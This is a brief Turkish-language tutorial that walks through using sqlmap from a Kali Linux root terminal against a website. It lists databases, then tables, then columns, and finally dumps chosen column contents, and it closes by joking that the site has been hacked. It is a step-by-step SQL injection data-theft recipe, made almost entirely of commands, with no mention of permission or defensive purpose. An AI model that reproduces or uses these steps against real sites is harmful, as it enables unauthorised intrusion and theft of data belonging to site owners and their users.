ilk olarak kali linuxımızı açıyoruz
sonra root terminaline giriyoruz
terminal açılınca:
 sqlmap -u sitemiz.com --dbs komudunu giriyoruz
sorulan y/n sorularına y diyoruz
açık varsa:
 sqlmap -u açıklısite -D database adı --table komudunu giriyoruz
ve databaseler önümüze çıkıyor:
 sqlmap -u açıklısite -D database adı -T tabloadı --column
tablodaki seçenekleri gördükten sonra hangi değerleri görmek istiyorsanız onu yazın(colunmlar):
 sqlmap -u açıklısite -D database -T tabloadı -C colunmlar --dump
evet sitemiz hacklendi xd